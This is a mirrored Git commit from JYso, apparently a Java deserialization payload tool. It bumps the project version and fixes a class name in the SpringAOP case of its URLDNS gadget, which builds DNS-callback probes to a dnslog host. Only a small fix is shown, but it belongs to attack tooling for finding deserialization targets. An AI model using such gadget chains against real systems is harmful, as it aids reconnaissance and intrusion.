mirror of
https://github.com/qi4L/JYso.git
synced 2026-09-21 22:40:43 +08:00
fix: 修复URLDNS链SpringAOP类错误
This commit is contained in:
+1
-1
@@ -121,7 +121,7 @@ dependencies {
|
|||||||
|
|
||||||
|
|
||||||
group = 'org.example'
|
group = 'org.example'
|
||||||
version = '1.3.5.2'
|
version = '1.3.6'
|
||||||
description = 'JYso'
|
description = 'JYso'
|
||||||
java.sourceCompatibility = JavaVersion.VERSION_1_8
|
java.sourceCompatibility = JavaVersion.VERSION_1_8
|
||||||
|
|
||||||
|
|||||||
@@ -231,7 +231,7 @@ public class URLDNS implements ObjectPayload<Object> {
|
|||||||
break;
|
break;
|
||||||
case "SpringAOP":
|
case "SpringAOP":
|
||||||
//fastjon/jackson两个链触发toString的变种,都需要springAOP
|
//fastjon/jackson两个链触发toString的变种,都需要springAOP
|
||||||
Object springAOP = getURLDNSGadget("SpringAOP." + dnsLog, "org.springframework.aop.target.HotSwappableTargetSource.HotSwappableTargetSource");
|
Object springAOP = getURLDNSGadget("SpringAOP." + dnsLog, "org.springframework.aop.target.HotSwappableTargetSource");
|
||||||
list.add(springAOP);
|
list.add(springAOP);
|
||||||
break;
|
break;
|
||||||
case "winlinux":
|
case "winlinux":
|
||||||
|
|||||||
Reference in New Issue
Block a user